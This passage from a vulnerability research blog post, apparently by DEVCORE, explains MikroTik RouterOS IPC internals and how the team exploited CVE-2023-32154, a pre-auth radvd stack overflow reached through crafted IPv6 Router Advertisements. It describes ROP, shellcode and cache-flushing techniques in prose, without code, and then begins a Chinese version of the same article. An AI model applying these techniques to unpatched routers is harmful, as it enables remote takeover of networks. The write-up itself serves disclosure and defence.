Most of the research centers around RouterOS’s homebrew IPC, so we also took some time to review it. Here is a simple example to explain the main idea of the IPC.

Normally, a user can log in to the RouterOS through telnet, and manage the router by console.

Let’s follow the procedure step by step:

  1. When the user tries to access the console of RouterOS through the telnet. The telnet process will spawn the login process by execl, which asks the user for account and password.
  2. After getting the account and password, the login would pack that info into a nova message, and send it to the user process for authentication.
  3. The user process returns the result by sending back a nova message
  4. If the login succeeds, the console process is spawned, and the user interaction with the console is actually proxied through the login process.

IPC

The above example simply describes the basic concept of IPC, but the communication between the two processes is actually more complex.

Every nova message would be sent to the loader process through the socket first, then the loader dispatches each nova message to the corresponding nova binary.

Suppose the id of the login process is 1039, the id of the user process is 13, and the handler with id 4 in the user process is responsible for verifying the account and password.

Firstly, the login process sends a request with an account and password to the user process, so the SYS_TO in nova message is an array with two elements 13, 4, which means that the message should be sent to the handler with id 4 in the process with binary id 13.

When loader receives the message, it will remove the 13 in SYS_TO of the message which represents the target binary id, and add the source binary id in SYS_FROM, which is 1039, and then send the message to the user process.

The user process does a similar thing when it receives a message: removing the 4 from SYS_TO that represents the target handler id and sending the nova message to handler 4 for processing.

Nova Message

The nova message used in IPC is initialized and set by nv::message and related functions. Nova message is composed of typed key-value pairs, and the key can only be an integer, so keys such as SYS_TO and SYS_FROM are just simple macros.

The types that can be used in a nova message include u32, u64, bool, string, bytes, IP and nova message (i.e. you can create a nested nova message).

Because the RouterOS doesn’t use nova messages in JSON anymore, we only focus on the binary format of it.

During IPC communication, the receiver’s socket receives an integer that expresses the length of the current nova message, followed by the nova message in binary format.

The nova message starts with two magic bytes: M2. Next, each key is described by 4 bytes; the first 3 bytes are used to express the id of the key, and the last byte is the type of the key. Depending on the type, the next bytes will be parsed differently as data, and the next key will come after data, and so on. A special feature is that a bool can be represented by only one bit, so the lowest bit of the type is used to represent True/False. For a more detailed format, see Ian Dupont, Harrison Green. Pulling MikroTik into the Limelight

The x3 format

In order to understand which nova binary the ids in the SYS_TO and the SYS_FROM in the nova message refer to, we need to parse a file with the extension x3, which is an xml in binary format. By parsing the /nova/etc/loader/system.x3 with the tool, we can map which nova binary each id corresponds to.

The id of some binaries are absent in this file, because some of them have been made available by installing an official RouterOS package. In which case the binary’s id will exist in the /ram/pckg/<package_name>/nova/etc/loader/<package_name>.x3. The radvd is an example.

However, there are still some id of binaries that cannot be found in any .x3 files because these types of processes are not persistent, e.g., the login process, which is only spawned when the user tries to log in and uses a serial number as its id.

The .x3 file is also used to record nova binary related settings, e.g. www specifies in .x3 which servlet should be used for each URI.

Summary

After reviewing the research and CVEs from the past, we can see that most vulnerabilities we are interested in have been concentrated in the past, and it seems to be difficult to find pre-auth vulnerabilities on the WAN side of RouterOS nowadays.

While vulnerabilities continue to be revealed, the RouterOS is becoming more and more secure. Is it true that there are no more pre-auth vulnerabilities on the RouterOS? Or maybe it’s just that everyone is missing something?

Most of the public research mentioned earlier falls into the following three categories:

  • Jailbreaking
  • The analysis of the exploits in the wild
  • The nova message in the IPC

However, after reversing the binary on RouterOS for a while, we realized that the complexity of the whole system was more than that, but no one mentioned the details. This led to the following thought: “No one with sanity would like to dive into the details of nova binary”.

Aside from the exploits leaked from the CIA and APT, most of the research about finding vulnerabilities in RouterOS are: fuzzing network protocols, playing with nova messages, or performing fuzzing tests on nova messages.

By the outcome, it seems that attackers understand the RouterOS much better than we do, and we need to explore more details about the nova binary to fill in the gaps and increase the possibility to find the vulnerabilities we are looking for. Don’t get me wrong. I don’t against fuzzing. But we must ensure we check everything essential to take advantage of the contest.

Where to begin

We don’t think the RouterOS is flawless, there is a gap between researchers’ and attackers’ understanding of RouterOS. So, what are we missing to find pre-auth RCE on RouterOS?

The first question that comes to mind is “where is the entry point of IPC and where does it lead?” Because most of the functionality triggered by IPC requires login, it is to be expected that sticking to IPC will only lead to more findings in post-auth. IPC is just one part of the main functionality implemented on RouterOS, and we would like to look at the core code of each functionality directly and carefully.

For example, how do the process that deal with DHCP extract the info needed in a DHCP packet? This information may be stored directly in the process, or may need to be sent to other processes via IPC for further processing.

The Architecture of Nova Binary

Hence, we must first understand the architecture of the nova binary. Each nova binary has an instance of the Looper class (or a derivative of it: MultifiberLooper), which is a class for event loop logic. In each iteration, it calls runTimer to execute the timer that is expired, and use poll to check the status of the sockets then process them accordingly.

Looper is responsible for the communication between its nova binary and the loader. Looper first registers a special callback function: onMsgSock, which is responsible for dispatching the nova message received from the socket to the corresponding handler in the nova binary.

The Handler class and its derivatives

When a looper receives a nova message, it will dispatch it to the corresponding handler, e.g., a message with SYS_TO of [14, 0] will be dispatched by the loader to a nova binary with a binary id of 14. By the time the looper in the binary with a binary id of 14 receives it, SYS_TO has [0] left, so the looper will dispatch it to handler 0 for processing. If the SYS_TO in the initial nova message is [14], then the looper receives it with SYS_TO as [], and the looper handles this message on its own.

Now let’s assume that the Looper receives a nova message that should be handled by handler 1 and dispatches it to handler 1. At this point, handler 1 calls the methods nv::Handler::handleCmd in the vtable of the handler class, which looks for the corresponding function to execute in the vtable based on the SYS_CMD specified in the nova message.

The cmdUnknown in the vtable is often overridden to extend the functionality, but sometimes the developer overrides handleCmd instead, depending on the developer’s mood. The handler class is a base class, so commands related to objects are not implemented.

Derived class

However, the basic handler class is not the most used one in nova binaries, but rather a derivative of it. Derived classes can be used to store multiple objects of a single type, similar to C++ STL containers.

For example, when a user creates a DHCP server through the web panel, a nova message with the command “add object” is sent to handler 0 of the dhcp process, which then creates a dhcp server object. And the object will be stored in a tree of handler 0.

The handler 0 here is an instance of AMap, AMap is a derived class of Handler. Since the command is “add object”, it triggers the member function AMap::cmdAddObj, which calls a function at offset 0x7c in handler 0’s vtable. And that function is actually the constructor of the object contained in AMap. For example, if the developer defines handler 0 to be of type AMap<string>, then the function at offset 0x7c is the constructor of the string.

The offset of the constructor of the inner object in the vtable is different for each derived class, and locating the constructor to determine what type of objects are contained in the derived class can be done by reversing their individual cmdAddObj function.

IPC, and something other than IPC

Some of the functions in RouterOS are not driven by IPC. Take the two layer 2 discovery protocols, CDP and LLDP, implemented in the discover program as an example.

  1. When starting the two services, handler 0 will be responsible for calling nv::createPacketReceiver to open the sockets and register the callback functions for CDP and LLDP.
  2. In each iteration of the Looper, call poll to check if the sockets of CDP and LLDP have received any packets.
  3. If packets are received, the corresponding callback function will be called to handle the packets.

What CDP’s callback does is very simple: it makes sure that the interface that received the packet is allowed, and if it is, it parses the packet and stores the information directly into the nv::ASecMap instead of using a nova message, and then returns.

It follows that IPC has no ability to trigger any function of CDP or LLDP other than to turn on CDP or LLDP services (which are turned on by default), so it is likely that previous research focused on IPC has not tested the program logic of such implementation.

The Story of Pre-Auth RCE

With the knowledge of RouterOS, a surprising accident led us to a long hidden vulnerability.

One day, when we plugged and unplugged the network cable as usual for reversing and debugging on RouterOS, we found that the log file recorded that the program radvd had crashed several times! So we tried plugging and unplugging the cable to manually reproduce the crash so that we could use the debugger to locate the problem, but after thousands of plugs and unplugs, we still couldn’t determine the conditions under which the crash was occurring, and it appeared to be just a random crash.

After a period of trial and error, we tried to find out where the crash occurred by static reversing the radvd rather than blindly trying. Though we still couldn’t find the root cause of the crash in the end, we found another vulnerability in radvd after reviewing the core logic in binary with the benefit of our understanding of the nova binary.

Before describing this vulnerability, let’s first explain what the radvd process does.

SLAAC (Stateless Address Auto-Configuration )

In short, the radvd is a service that handles SLAAC for IPv6.

In a SLAAC environment, suppose a computer wants to get an IPv6 address to access the Internet, it will first broadcast an RS (Router Solicitation) request to all routers. After the router receives the RS, it will broadcast the network prefix through RA (Router Advertisement); computers receiving the RA can take the network prefix then combine it with the EUI-64 to decide what IPv6 address they’re going to use for connecting to the Internet.

If an ISP or network administrator wants to assign a network segment to a user, so that the user can assign the address to the user-managed machines. How to assign a segment to the user when only using SLAAC without DHCP? Because SLAAC does not have a way to delegate directly, this is how it usually works:

Suppose there is an upstream router: Router A, which belongs to an ISP or a network administrator, a user-managed Router B, and a user-managed computer. The ISP or the network administrator will notify the user via email in advance about a /48 network prefix assigned to the user, which is 2001:db8::/48 in this case. Users can set it on Router B, then when the computer sends RS to Router B, Router B will put this prefix into RA for return, this prefix is called routed prefix.

In order to make Router B be able to communicate with Router A, it also needs to get network prefix from Router A for an IPv6 address of its own. And the network prefix that Router B gets from Router A is called a link prefix.

The execution flow of the radvd

  1. When the radvd process is started, the socket used by radvd is opened by nv::ThinRunner::addSocket and the corresponding callback function is registered.
  2. In each iteration of the Looper in radavd, the socket is checked by calling the poll to see if it has received any packets.

  3. If any packets are received, the corresponding callback function will be called to process the packets.

In the callback function of rardvd, it will first check if the packet is a legitimate RA or RS, if it’s RA, store the information, if it’s RS, start broadcasting RA in LAN.

There are total three cases in which the RouterOS broadcasts the network prefix:

  1. Received RS from LAN
  2. Received RA from WAN
  3. Timed broadcast of RA packets on LAN (default random broadcast after 200~600 seconds)

But we didn’t find the code that’s responsible for case 2 in the callback function by statically reversing. At that time we were not sure why, it is actually related to the subscription mechanism in the RouterOS IPC, which we will explain in a later chapter. However, there are two other cases that we can find out directly through static analysis.

In case 1, when an RS is received from the LAN, radvd will call sendRA to broadcast the RA packet:

In case 2, handler 1 will register a timer, RAroutine, after initialization:

The RAroutine is used to call sendRA at regular intervals to broadcast packets:

CVE-2023-32154

After digging deeper into sendRA, we found that radvd has a vulnerability in handling DNS advisory. First, radvd will store the DNS advisory from the RA received from the upstream router (the data structure is a tree), and when it wants to broadcast the RA to the LAN, these DNS will also be wrapped in the RA and broadcast to the LAN.

In radvd, it is the addDNS function that expands the tree and puts it into the ICMPv6 packet. In the following figure, the first parameter of addDNS, RA_raw, is a buffer of 4096 bytes, which is the final ICMPv6 packet.

Stepping into the addDNS, we can immediately see that there may be a stack buffer overflow here. The addDNS puts DNS into ICMPv6 packets via memcpy without any boundary check, and as long as the DNS advisory is big enough, it can trigger a stack buffer overflow.

The DNS records used here come from the RDNSS field in the RA packet, but according to the RFC, we can find that the field used to describe the length of RDNSS is only 8-bit. It can cover only 255*16 bytes at most, and this length is insufficient for us to overwrite the return address.

But if this is not the first time the radvd received RA, radvd needs to mark the old DNS as expired in the next packet, so we can actually cover twice the length, which is 255*16*2 bytes. That is enough for us to overwrite the return address.

Attacking

Now, the attacker only needs to send two crafted RA packets with RDNSS field length of 255 to the target RouterOS, and the attacker can control the execution flow of the radvd program through the IPv6 address in the RDNSS.

The Protection of Binaries

Since the architecture of target RouterOS is MIPS architecture, the CPU doesn’t support NX, but other protections are also not enabled.

So it’s just a matter of finding a good ROP gadget and letting the execution flow eventually jump to the shellcode we place on the stack, easy peasy lemon squeezy.

The Constraint of Shellcode

However, there are actually quite a number of limitations in the process of constructing an exploit, for example, since IPv6 addresses are stored in a tree structure, they are sorted before being placed on the stack, so we need to make sure that the payload we build remains the same after sorting.

The simplest way to do this is to make the IPv6 prefix to be a serial number, which ensures that the contents of our payload are in order, and that we can accurately jump to the shellcode through the ROP gadget. When writing the shellcode, we just need to construct the suffix of each address as a jump, so that we can skip the non-executable serial number.

However, due to the delay slot in MIPS, the CPU will actually execute the next instruction of the jump instruction first.

So we have to move the jump forward, but since we can’t use the syscall command in the delay slot, the payload will be a pain to construct, and may exceed the length we can use, which is basically a bad idea.

In fact, this is a common beginner level problem in CTF. All we need is to make the prefix of IPv6 address a legal instruction that does not affect the execution result. We change the prefix to addi s8, s0, 1, addi s8, s0, 2, addi s8, s0, 3…… and so on. In addition to the payloads being sorted, it also saves the space that would otherwise be used for jump instructions.

But since we didn’t leak the stack address, and since we can’t find any gadgets available to move the stack address from the $sp register to the $t9 register, what we’ve done here is to first write the jalr $sp instruction to memory via a ROP gadget, and then jump to it and execute it with a ROP gadget, which then directs the flow to the shellcode that we’ve constructed, and that sounds pretty good:

But this is not enough to run shellcode, because MIPS has two different cache for memory access.

Cache

MIPS has two caches: I-cache (instruction cache) and D-cache (data cache).

When we write the jslr $sp instruction to the memory, it’s actually written to D-cache.

When we control the execution flow to jump on the address of jslr $sp, the processor will first check whether the instruction at this address is in the I-cache or not, and since we jump to a data section, the cache will always miss it. And so, the contents of the memory will be loaded into the I-cache.

However, since the contents of the D-cache have not been written back to memory, I-cache will only copy a bunch of null bytes from memory, which is nop in MIPS, so the radvd only runs a bunch of nop until it crashes.

Here we need to make the processor write the contents of the D-cache back to memory, and there are two ways to do this: a context switch or exhausting the D-cache space (32 KB).

Triggering a context switch is easier, but there is no sleep in radvd that we can use to trigger a context switch, and while other functions can trap into the kernel, the chances of a context switch occurring are not very high. In order to compete for the Pwn2Own, it is necessary to have a consistent attack that is close to 100% successful. Therefore, we turned to find a way to exhaust the 32kb D-cache.

First , a simple check shows that the radomize_va_space variable of RouterOS is 1, which means that the memory address of the heap is not random, so we don’t need a leak to know where the heap is. We just need to find a way to make the heap allocate enough space, and then write some gibberish on it to deplete the 32kb D-cache.

However, since there are no good ROP gadgets, such a payload will need too many ROP gadgets, and eventually the payload length may exceed the length we can cover.

Luckily, as mentioned earlier, DNS itself is stored in a tree structure, so it already occupies a large chunk of memory in the heap. Through the step-by-step execution of gdb, we can make sure that by the time DNS is being processed, the heap is already bigger than 32kb, so we just need to call memcpy to write 32kb of gibberish to the heap through the GOT hijack and that’s it!

Finally, our exploit is complete:

Combined with another Canon printer vulnerability we found for Pwn2Own, the attack flow would be:

  1. The attacker, as a bad neighbor of the router, sends crafted ICMPv6 packets to it
  2. After successfully controlling the router, we perform port forwarding to direct the payload to the Canon printer on the LAN.

In a Pwn2Own environment, the network environment can be simplified a bit as follows:

Debugging for Exploit

Just when we thought we had the $100,000 prize in the pocket, something unexpected happened: our exploit failed on Ubuntu, whether it was a virtual machine in MacOS or an Ubuntu machine; and Pwn2Own officials, who basically used Ubuntu to execute our exploit, so we had to solve this problem.

We tried running the exploit on MacOS and recording the network traffic, then replaying the traffic on Ubuntu, and we can observe that the replay fails:

We also tried running the exploit on Ubuntu and recording the network traffic, of course it failed on Ubuntu. But when we replayed the failed traffic on MacOS, it succeeded:

Up to this point, we guessed that one of the OSes reordered the packets before sending them out, and that might have been done after Wireshark captured the packets. So we wrote a sniffer and put it on the router to monitor the traffic, and the result should be very reliable since AF_PACKET type of sockets are not affected by the firewall rules:

However, the packets recorded from both sides are exactly the same……

So, apparently I’m the bus factor now. Exploit has only worked on my macOS so far, and if the situation remains, the last resort would be to fly myself to Toronto with my Mac laptop and do the attack on site with my own laptop. But there’s no way we’re going to leave this problem of unknown cause unattended, who knows if it might happen to my laptop during the Pwn2Own as well, and that would be a real loss.

After a few careful reviews, we finally know the cause of the problem: speed. Since the time window between the two RA packets is not that big, it’s hard to tell from the Wireshark timeline, but if you do some math, you’ll see that the difference in time between the two packets is 390 times. So the problem is not with Ubuntu, it’s because the Mac sent the two packets too fast, and accidentally triggered the race condition in radvd (plus I didn’t properly calculate how many bytes it takes to overwrite the return address, I just wrote all the gibberish on it and did a pattern match. So the offset is only correct under the race condition).

The solution is to sleep for a while between sending two RA packets and fix the offset in the payload, which will stabilize our attack with a 100% chance of success.

Fix

This vulnerability has been fixed in the following releases:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8, 7.10
  • Testing Release 7.10rc6

At the same time, we also found that this vulnerability has existed since RouterOS v6.0. From the official website can be found 6.0 release date is 2013-05-20, that is to say, this vulnerability has existed there nine years, but no one has found him.

Echoing our initial thought, “No one with sanity would like to dive into the details of nova binary”, Q.E.D.

The Race Condition

But how did this race condition that prevents us from easily earning $100,000 happen? As mentioned above, nova binary has a Looper that loops for dealing with events, i.e. it’s a single thread program, so what’s the race condition all about? (Some nova binary is multi-fiber, but radvd isn’t.)

I didn’t mention that when radvd parse the RA packets received from WAN, the DNS is stored in a “vector”, but when preparing the RA packets for broadcasting on LAN, addDNS expands a “tree” with DNS stored in it, so what is the relationship between this vector and the tree?

That’s why we didn’t find the logic “broadcasts RA packets to the LAN when it receives RA from the WAN” in the callback, because it’s the result of the interaction between the two processes.

If we take a closer look at what the callback does, we can see that there is an array that holds an object called the “remote object”. The code looks intuitive, it iterates over a vector of DNS addresses, calls nv::roDNS once for each DNS address, and saves the result of the function execution in the and saves the result of the function execution in the DNS_remoteObject vector.

Remote Object

So what is a remote object? Remote object is a mechanism used in RouterOS to share resources across processes, one process is responsible for storing this shared resource, then another process can send requests to the process responsible for storing it to make additions, deletions, and modifications by specifying the ids. For example, the DNS remote object is actually placed in handler 2 of the resolver process, while handler 1 of radvd simply keeps the ids of these objects.

Subscription and Notification

When a remote object is updated, some process may want to respond, so the nova binary can subscribe to other nova binary in advance. Take dhcp and ippool6 for example, handler 1 in ippool6 is responsible for managing the ipv6 address pool, the dhcp process subscribes to handler 1 in ippool6, so when there are changes in the ipv6 address pool, dhcp can check whether they need to be processed further, such as shutting down a dhcp server.

The subscription behavior is achieved by sending a nova message to the binary that wants to subscribe, with a SYS_NOTIFYCMD that contains the specific conditions that it wants to be notified about.

When another process adds an object to ippool6, handler 1’s cmdAddObj function will be executed.

In most cases, AddObj will call sendNotifies to notify subscribers who have subscribed to the 0xfe000b event that their subscribed objects have been altered, so ippool6 here sends a nova message to the dhcp process informing it of the result of the object being altered.

After understanding the subscription mechanism, we can more fully understand the interaction between radvd and the resolver as follows:

When radvd receives the RA packet from the WAN, it will call roDNS for each IPv6 address. Handler 4 in resolver handles this request and creates the corresponding ipv6 object in handler 2. Then, because handler 1 in radvd subscribes to handler 2 in resolver, handler 2 in resolver pushes all the DNS addresses that it has to radvd, then handler 1 constructs a RA packet based on the DNS address he received, and then broadcasts the packet on the LAN.

The Root Cause of Race Condition

The problem is actually in the implementation of roDNS, where roDNS uses postMessage to send a nova message. postMessage is non-blocking, meaning that the remote object in radvd doesn’t immediately know what id of a remote object corresponds to in the resolver.

If our second packet arrives too soon, so that radvd doesn’t know what the remote object’s id is, then radvd can’t delete these objects in the first place, it can only mark them as destroyed for soft deletion, which results in a race condition.

Let’s try to understand the whole process step by step:

First, since both processes are single thread, we can assume that radvd and resolver are in their first loop. The radvd receives an RA from the WAN with only one DNS address, and radvd sends a request for creating a remote object to the resolver.

At the same time, resolver will set a timer when it receives the first request, because in the IPC mechanism, resolver has no way of knowing how many AddObj requests belong to the same group, so it simply sets a timer , and sends out a notification when the time is up. The resolver should reply with a nova message as a response, informing radvd of the id of the remote object that has just been added, and radvd will register a corresponding ResponseHandler to handle this request.

However, if the second RA packet is delivered so fast that the resolver hasn’t sent the response back yet, radvd can only mark the old DNS remote object as destroyed for soft deletion first.

Then radvd proceeds to create a new DNS remote object for the RDNSS field in the second RA packet received, but since the resolver hasn’t finished the first iteration yet, this new request stays in the socket until the next iteration.

Going back to resolver, the first iteration ends by passing back an id to radvd. radvd’s ResponseHandler will update the remote object based on the id it gets. But since the corresponding remote object has been marked for deletion, the ResponseHandler will delete the object instead of updating the object id.

After the ResponseHandler deletes the remote object saved in radvd, it will send a delete object message to resolver, informing it that the corresponding remote object is no longer in use and has to be deleted, but the request will still be stuck in the socket waiting to be processed.

The resolver then proceeds to the second iteration, where it gets a request from the socket to create a remote object for the second RA.

At this point, the previously set timer expires and the resolver calls nv::Handler::sendChanges to notify all subscribers what DNSs the resolver now knows about, since object 1 has not been deleted yet, so the resolver pushes the DNS that was created by the two requests. The DNS created by the two requests will be pushed out.

When radvd receives this information, it immediately constructs a RA packet to broadcast over the LAN, and the results of the two requests are mixed together, which is why our attack only succeeds on MacOS in the first place.

The race condition itself sounds hard to be triggered (it won’t be triggered if the delete request is processed before the timer), but this is because the whole process has been greatly simplified for ease of explanation, and in fact, as long as the time between the arrival of the two packets is short enough, the race will be successful.

Summary

Through the above analysis, we found a pattern of race conditions in the remote object mechanism of RouterOS:

  • Use non-blocking methods to create/delete the remote object
  • Subscribe to the remote object

Because it is possible to mix the results of two requests into a single response, this could possibly be used to bypass some security checks. If we can find such a vulnerability, it could be used to participate in the router category.

In the end, we were pressed for time and we didn’t find any exploitable vulnerabilities through the race condition.

And not only that, we realized that the exploit that we had tested hundreds of times over the past few months still had some issues, and we still couldn’t get it to work three hours before the registration deadline. We kept updating the exploit and the white paper we were going to submit, and it was done until half an hour before the deadline (4:00 AM deadline).

But luckily, we were able to complete the attack with only one attempt at Pwn2Own, becoming the first team in history to complete the new category of SOHO SMASHUP:

We earned 10 Master of Pwn points and $100,000 by this category, and at the end of the tournament, DEVCORE was crowned the winner with 18.5 Master of Pwn points.

In addition to receiving the Master of Pwn title, trophy, and jacket, the organizers will also send us one of each of the devices we hacked.

(We can’t fit all of them into a picture)

Conclusion

In this study, we have explored RouterOS in depth and revealed a security vulnerability that has been hidden in RouterOS for nine years. In addition, we found a design pattern in IPC that leads to a race condition. Meanwhile, we also open-source the tools used in the research at https://github.com/terrynini/routeros-tools for your reference.

Through this paper, DEVCORE hopes to share our discoveries and experiences to help white hat hackers gain a deeper understanding of RouterOS and make it more understandable.

Pwn2Own Toronto 2022 : A 9-year-old bug in MikroTik RouterOS

$
0
0

English Version, 中文版本

TL;DR

DEVCORE 研究組在 Pwn2Own Toronto 2022 白帽駭客競賽期間,透過研究過去少有人注意到的攻擊面,在 MikroTik 旗下路由器產品所使用的 RouterOS 作業系統中,發現了存在九年之久的 WAN 端弱點,透過串連該弱點與另一個同樣由 DEVCORE 發現的 Canon printer 弱點,DEVCORE 成為史上第一個在 Pwn2Own 賽事中成功挑戰 SOHO Smashup 項目的隊伍;最終 DEVCORE 在 Pwn2Own Toronto 2022 奪下冠軍,並獲頒破解大師(Master of Pwn)的稱號。

該 WAN 端弱點發生在 RouterOS 中的 radvd 程式,由於該程式在處理 IPv6 SLAAC 的 ICMPv6 封包時,未對 RDNSS 欄位的長度進行檢查,導致攻擊者可透過發送兩次 Router Advertisement 封包觸發緩衝區溢位攻擊,使得攻擊者可在不需登入且無需使用者互動的情況下控制路由器底層的 Linux 系統進行高權限操作,取得路由器的完整控制權;此弱點被登記為 CVE-2023-32154,其 CVSS 分數為 7.5。

針對上述弱點, DEVCORE 已於 2022/12/29 經由 ZDI回報 MikroTik 處理,並在 2023/05/19 完成修補,以下 RouterOS 版本已經對此弱點進行修補:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8
  • Stable Release 7.10
  • Testing Release 7.10rc6

Pwn2Own 與 SOHO Smashup 簡介

Pwn2Own 是一系列由趨勢科技的 Zero Day Initiative(ZDI)主辦的比賽,每場賽事都會針對該次主題挑選一些熱門的產品作為目標,例如:作業系統、瀏覽器、電動車、工控系統、路由器、印表機、智慧音箱、手機、NAS、網路攝影機……等等。只要參賽隊伍可以在無需使用者互動、設備處於預設狀態、軟體更新至最新版本的條件下,演示攻擊並成功獲得設備的主控權,就可以獲得相應的 Master of Pwn 點數和獎金。賽末結算時,Master of Pwn 點數最高的隊伍就是冠軍,也被稱為破解大師(Master of Pwn)。

前幾年由於疫情的關係,Work From Home 或是 SOHO(即小型辦公/家庭辦公)變得非常普遍,因此 2022 的 Pwn2Own Toronto 也新增了一個稱作 SOHO Smashup 的特別項目,參賽者需要從 WAN 端入侵路由器後,再將路由器作為跳板攻擊居家常見的設備,例如:智慧音響、印表機等設備。

這個特別的新項目,除了獎金是所有項目中第二高的 $100,000(USD)之外,得分也是最高的十分,因此如果目標是奪冠,奪下這個項目絕對是如虎添翼!DEVCORE 在本次賽事中也特別挑選較少人研究的 MikroTik 作為目標,避免與他人找到重複的漏洞(與其他人撞洞時,獎金與得分皆減半),最大化奪冠的機率。

RouterOS 簡介

MikroTik 開發的 RouterOS 是一套基於 Linux 核心的作業系統,也是 MikroTik 旗下產品 「RouterBoard」上預設安裝的作業系統,RouterOS 亦可被安裝在個人電腦上,用來將電腦作為路由器使用。

雖然基於 Linux 核心開發的 RouterOS 確實有使用 GPL 授權的開源軟體,但如果想要得到相關的程式碼,根據官方網站 downloadterms的說明,需要匯 45 塊美金給 MikroTik ,他們才會寄給你一張燒好 GPL source 的光碟,非常有趣的想法!幸好已經有人將 MikroTik 的 GPL source上傳到 Github,但在檢視過後,我們認為裡面的程式碼對於後續分析沒有太大的幫助。

RouterOS v7 與 RouterOS v6

在 MikroTik 官網的下載頁面上同時存在 RouterOS v7 以及 RouterOS v6 兩個版本,兩者之間的關係比較像是 RouterOS 的不同 branch,在設計上大同小異。因為我們的目標設備 RouterBoard RB2011UiAS-IN 預設安裝的是 RouterOS v6,所以我們先以 RouterOS v6 作為研究對象。

RouterOS 並沒有正式提供一個方法讓使用者直接管理底層的 Linux 系統,使用者被關在一個功能受限的 console 裡面,只能使用 RouterOS 提供的有限指令去管理這台路由器。因此過去有不少研究是關於如何 jailbreak RouterOS。

RouterOS 上的 binary 之間使用一種 MikroTik 自製的 IPC 進行溝通,此 IPC 利用稱為 nova message 的資料結構在各程式間交換資訊,因此我們將這類 binary 統一稱作 nova binary。

另外,RouterOS 還存在一個比較特別的攻擊面。在日常應用中,使用者可以透過 WinBox 這套 GUI 管理工具在 Windows 電腦上對 RouterOS 進行遠端管理,其原理是透過 TCP 向路由器傳送 nova message。因此若 RouterOS 沒有針對 nova message 做好權限驗證時,攻擊者就有機會自遠端發送一個夾帶惡意 nova message 的 TCP 封包入侵路由器;不過 WinBox 預設僅能從 LAN 端使用,對我們來說不是優先事項,因為這次的目標是從 WAN 端進行攻擊!

CVE 回顧

首先,為了熟悉 RouterOS 的攻擊面,我們全面審視了過去的 CVE。當時與 RouterOS 有關的 CVE 總共有 80 個,而當中可被用來在 pre-auth 情境下進行攻擊,且目標是路由器本身的共有 28 個 。

28 個 CVE 當中有 4 個 CVE 的使用情境是較符合 Pwn2Own 規則所描述的情境,這些 CVE 可以讓攻擊者在不需使用者互動的情況下在路由器上喚起一個 shell 或登入為 admin。這 4 個漏洞當中,有 3 個是在 2017 年至 2019 年這段時間被發現的,而且當中 3 個是「in the wild」而不是第一時間經由白帽駭客主動通報,這四個漏洞分別是:

  • CVE-2017-20149:又稱 Chimay-Red,是 2017 年從 CIA 外洩的武器庫「Vault 7」中,針對 RouterOS 進行攻擊的漏洞之一。漏洞發生在 RouterOS 解析 HTTP 請求時,若 HTTP headers 中的 Content-Length 是負值,會造成 Integer Underflow,搭配 Stack Clash 的攻擊手法就能控制程式流程達成 RCE。
  • CVE-2018-7445:是一個存在於 RouterOS 自己實做的 SMB 中的 buffer overflow。這是透過黑箱模糊測試找到的漏洞,也是四個漏洞中唯一一個由發現者自行回報的漏洞,一樣能夠控制程式執行流程最後達成 RCE,但 SMB 不是預設開啟的服務。
  • CVE-2018-14847:也是「Vault 7」中針對 RouterOS 進行攻擊的漏洞之一。這個漏洞使攻擊者可以不需登入就讀取任意檔案,乍聽之下好像不是大問題,但由於在 RouterOS 的早期版本中,使用者的密碼是以 password xor md5(username + "283i4jfkai3389")的方式儲存在檔案中,所以只要能夠讀取這個檔案,攻擊者就可以逆算得到 admin 的密碼。
  • CVE-2021-41987:在 SCEP 服務的 base64 解碼過程中,因為長度計算錯誤導致的 heap buffer overflow 漏洞,這是資安研究員分析了 APT 在其 C2 server 上的 exploit 後反推出來的漏洞。

可以發現,這些漏洞大多是「in the wild」,我們無從得知當初發現漏洞的人是如何進行分析及思考。因此關於分析 RouterOS 的思路或是技巧,透過這些漏洞能學習到的十分有限。

相關研究回顧

我們繼續研讀公開的研究資料,在比賽的當下我們有這些文章以及演講可以參考:

IPC 與 Nova Message 回顧

可以發現上述的研究大部分都離不開 RouterOS 的自製 IPC,所以我們也簡單的對其機制進行了回顧。 這裡使用一個簡單的例子對 IPC 進行說明。

日常使用場景中,使用者可以透過 telnet 登入至 RouterOS,並使用 conolse 對路由器進行管理。

讓我們拆解整個流程中 IPC 參與的部分:

  1. 當使用者欲透過 telnet 存取 RouterOS 的 console 時,telnet process 會使用 execl去執行 login這個程式,並向使用者索取帳號及密碼。
  2. 當使用者送出帳號密碼之後,login process 會將帳號密碼放進 nova message 中,發送至 user process 請求驗證
  3. user process 完成驗證後,透過 nova message 通知驗證的結果
  4. 如果登入成功就會喚起 console process,接下來使用者與 console互動的過程都是透過 login process 轉發

IPC 簡介

上面的例子簡單地描述了 IPC 的基本概念,但兩個 process 間的溝通實際上更加複雜。首先,每個送往其他程式的 nova message 都會先透過 socket 被送往 loader,接著 loader才根據 message 內容把 message 分派給對應的 nova binary。

讓我們舉一個簡單的例子來說明:假設 login process 的 id 是 1039;user process 的 id 是 13,且 user process 中負責驗證帳號密碼的是 id 為 4 的 handler。 則在登入驗證流程中,login process 首先會送一個包含帳號密碼的請求給 user process,這時的 SYS_TO是一個包含兩個元素的陣列:[13, 4],表示要把 message 送給 binary id 為 13 的 process 中 id 為 4 的 handler。

loader收到 message 後,它會先移除 message 內 SYS_TO中代表目標 binary id 的 13,並在 SYS_FROM 中增加來源 binary 的 id,也就是 1039,之後把 message 傳送給 user process。

user process 收到 message 後也會做類似的事情,將SYS_TO中代表目標 handler id 的 4 移除後,接著把 nova message 送至 handler 4 進行處理,最終由 handler 4 執行驗證的邏輯。

Nova Message 簡介

而上述 IPC 中使用的 nova message 是由 nv::message及相關的 function 進行初始化與設定。Nova message 實際上是由具有型別的 key-value pair 構成,且 key 只能是整數,所以 SYS_TOSYS_FROM等 key 只是單純的 macro 罷了。而 nova message 中可以使用的型別包括 u32, u64, bool, string, bytes, IP 及 nova message (也就是可以建立巢狀的 nova message)。

因為 RouterOS 已不用 JSON 來傳遞 nova message,所以我們只針對 binary 格式進行說明。在 IPC 溝通過程中,收方的 socket 首先會收到一個表達當前 nova message 長度的整數,之後接著 binary 格式的 nova message。

